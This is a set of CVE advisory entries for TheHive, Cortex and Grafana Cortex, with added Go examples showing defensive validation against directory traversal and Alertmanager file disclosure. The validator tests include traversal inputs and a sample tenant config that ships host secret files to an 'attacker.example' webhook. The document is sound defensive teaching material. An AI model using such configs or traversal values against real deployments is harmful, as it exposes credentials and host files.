
CVE-2023-39069
https://notcve.org/view.php?id=CVE-2023-39069
11 Sep 2023 — An issue in StrangeBee TheHive v.5.0.8, v.4.1.21 and Cortex v.3.1.6 allows a remote attacker to gain privileges via the Active Directory authentication mechanism. • https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2022-001%3A%20Authentication%20bypass%20due%20to%20incomplete%20checks%20in%20the%20Active%20Directory%20authentication%20module.md • CWE-287: Improper Authentication •

CVE-2021-36157 – cortex: Grafana Cortex directory traversal
https://notcve.org/view.php?id=CVE-2021-36157
03 Aug 2021 — An issue was discovered in Grafana Cortex through 1.9.0. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal, such as a ../../sensitive/path/in/deployment pathname, then Cortex will attempt to parse a rules file at that location and include some of the contents in the error message. (Other Cortex API requests can also be sent a malicious OrgID header, e.g., tricking the ingester into writing metrics to a different location, but the ef... • https://github.com/cortexproject/cortex/pull/4375 • CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') •
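The pattern behind this entry is a per-tenant path built from an attacker-controlled header. The following Go example is added here to illustrate it; it is not Cortex's code or the fix in the referenced pull request. It puts the vulnerable join next to a hardened version that validates the tenant ID (the character set and the 150-byte limit are this example's choices) and then independently checks that the cleaned path still lies under the rules directory. The directory and tenant IDs are constructed sample input.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// maxTenantIDLen is this example's limit, not a Cortex constant.
const maxTenantIDLen = 150

var errBadTenantID = errors.New("invalid X-Scope-OrgID")

// rulesPathUnsafe mirrors the pre-fix pattern the advisory describes: the raw
// X-Scope-OrgID value is joined into the rules path, so "../../x" walks out of
// rulesDir. Kept here as the vulnerable form to compare against.
func rulesPathUnsafe(rulesDir, orgID string) string {
	return filepath.Join(rulesDir, orgID, "rules.yaml")
}

// validateTenantID accepts only a conservative character set and rejects the
// empty string, ".", "..", over-long values and anything containing a path
// separator. The rule set is this example's choice.
func validateTenantID(id string) error {
	if id == "" || len(id) > maxTenantIDLen || id == "." || id == ".." {
		return errBadTenantID
	}
	for _, r := range id {
		switch {
		case r >= 'a' && r <= 'z', r >= 'A' && r <= 'Z', r >= '0' && r <= '9':
		case r == '-', r == '_', r == '.':
		default: // covers '/', '\\', NUL, whitespace and non-ASCII
			return errBadTenantID
		}
	}
	return nil
}

// rulesPathSafe validates the tenant ID and then independently checks that the
// cleaned result still lies inside rulesDir, so a future gap in the validator
// cannot turn into traversal.
func rulesPathSafe(rulesDir, orgID string) (string, error) {
	if err := validateTenantID(orgID); err != nil {
		return "", err
	}
	base := filepath.Clean(rulesDir)
	p := filepath.Join(base, orgID, "rules.yaml")
	if !strings.HasPrefix(p, base+string(filepath.Separator)) {
		return "", fmt.Errorf("%q escapes %q", p, base)
	}
	return p, nil
}

func main() {
	const rulesDir = "/var/cortex/rules" // constructed example directory
	for _, orgID := range []string{"team-a", "../../etc", "a/b", ".."} {
		fmt.Printf("unsafe %-12q -> %s\n", orgID, rulesPathUnsafe(rulesDir, orgID))
		p, err := rulesPathSafe(rulesDir, orgID)
		if err != nil {
			fmt.Printf("safe   %-12q -> rejected: %v\n", orgID, err)
			continue
		}
		fmt.Printf("safe   %-12q -> %s\n", orgID, p)
	}
}
```

With "../../etc" the unsafe join resolves to /var/etc/rules.yaml, which is exactly the traversal the advisory describes; the safe version rejects it at the validator, and the prefix check would still catch it if the validator were ever loosened. Validating the header once at the edge (before it reaches the ruler, ingester or any other component) is the point, since the advisory notes the same header is used elsewhere too.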

CVE-2021-31232
https://notcve.org/view.php?id=CVE-2021-31232
30 Apr 2021 — The Alertmanager in CNCF Cortex before 1.8.1 has a local file disclosure vulnerability when -experimental.alertmanager.enable-api is used. The HTTP basic auth password_file can be used as an attack vector to send any file content via a webhook. The alertmanager templates can be used as an attack vector to send any file content because the alertmanager can load any text file specified in the templates list. • https://community.grafana.com/c/security-announcements •
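Both vectors in this entry are the same class of problem: a tenant-supplied Alertmanager config that names a file on the Cortex host, which the process then reads and ships out over a webhook. The Go example below is added here to show a policy check over such a config; it is not Cortex's code and the rule set is this example's, not the upstream fix. The config types are minimal stand-ins for the Alertmanager YAML keys named in the comments, and both sample configs are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// Minimal stand-ins for the Alertmanager config fields that matter here.
// Comments give the YAML keys; these are example types, not Cortex's.
type HTTPClientConfig struct {
	BasicAuthPassword     string // basic_auth.password      (inline value, fine)
	BasicAuthPasswordFile string // basic_auth.password_file (host file reference)
	BearerTokenFile       string // bearer_token_file        (host file reference)
}

type WebhookConfig struct {
	URL        string           // url
	HTTPConfig HTTPClientConfig // http_config
}

type Receiver struct {
	Name           string          // name
	WebhookConfigs []WebhookConfig // webhook_configs
}

type AlertmanagerConfig struct {
	Templates []string   // templates
	Receivers []Receiver // receivers
}

// validateTenantConfig reports every file reference a tenant could use to read
// from the Cortex host. Templates must be bare file names; the caller is then
// expected to resolve them only inside that tenant's own template directory.
func validateTenantConfig(cfg AlertmanagerConfig) error {
	var problems []string
	for _, t := range cfg.Templates {
		if t == "" || t == "." || t == ".." || t != filepath.Base(t) {
			problems = append(problems, fmt.Sprintf("templates: %q is not a plain file name", t))
		}
	}
	for _, r := range cfg.Receivers {
		for i, w := range r.WebhookConfigs {
			where := fmt.Sprintf("receiver %q webhook_configs[%d]", r.Name, i)
			if w.HTTPConfig.BasicAuthPasswordFile != "" {
				problems = append(problems, where+": basic_auth.password_file is not allowed, use an inline password")
			}
			if w.HTTPConfig.BearerTokenFile != "" {
				problems = append(problems, where+": bearer_token_file is not allowed, use an inline credential")
			}
		}
	}
	if len(problems) > 0 {
		return errors.New(strings.Join(problems, "; "))
	}
	return nil
}

// weakConfig is a constructed tenant config of the shape the advisory warns
// about: a webhook whose basic-auth password is read from a host file, and
// template entries that point outside the tenant's template directory.
func weakConfig() AlertmanagerConfig {
	return AlertmanagerConfig{
		Templates: []string{"/etc/cortex/runtime.yaml", "../../proc/self/environ"},
		Receivers: []Receiver{{
			Name: "exfil",
			WebhookConfigs: []WebhookConfig{{
				URL:        "https://attacker.example/hook",
				HTTPConfig: HTTPClientConfig{BasicAuthPasswordFile: "/etc/cortex/secrets/s3.key"},
			}},
		}},
	}
}

// fixedConfig is the same tenant config with an inline credential and a bare
// template name.
func fixedConfig() AlertmanagerConfig {
	return AlertmanagerConfig{
		Templates: []string{"slack.tmpl"},
		Receivers: []Receiver{{
			Name: "ops",
			WebhookConfigs: []WebhookConfig{{
				URL:        "https://hooks.example/ops",
				HTTPConfig: HTTPClientConfig{BasicAuthPassword: "inline-secret"},
			}},
		}},
	}
}

func main() {
	fmt.Println("weak:", validateTenantConfig(weakConfig()))
	fmt.Println("fixed:", validateTenantConfig(fixedConfig()))
}
```

The check runs at config-upload time, before anything is read from disk, so a rejected config never reaches the Alertmanager loader. Any other Alertmanager field that takes a file path (TLS cert, key and CA files are the obvious ones) deserves the same treatment in a multi-tenant deployment.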

CVE-2018-20226
https://notcve.org/view.php?id=CVE-2018-20226
21 Dec 2018 — An organization administrator can add a super administrator in THEHIVE PROJECT Cortex before 2.1.3 because the Role.toString method was not overridden. • https://github.com/TheHive-Project/Cortex/blob/2.1.3/CHANGELOG.md •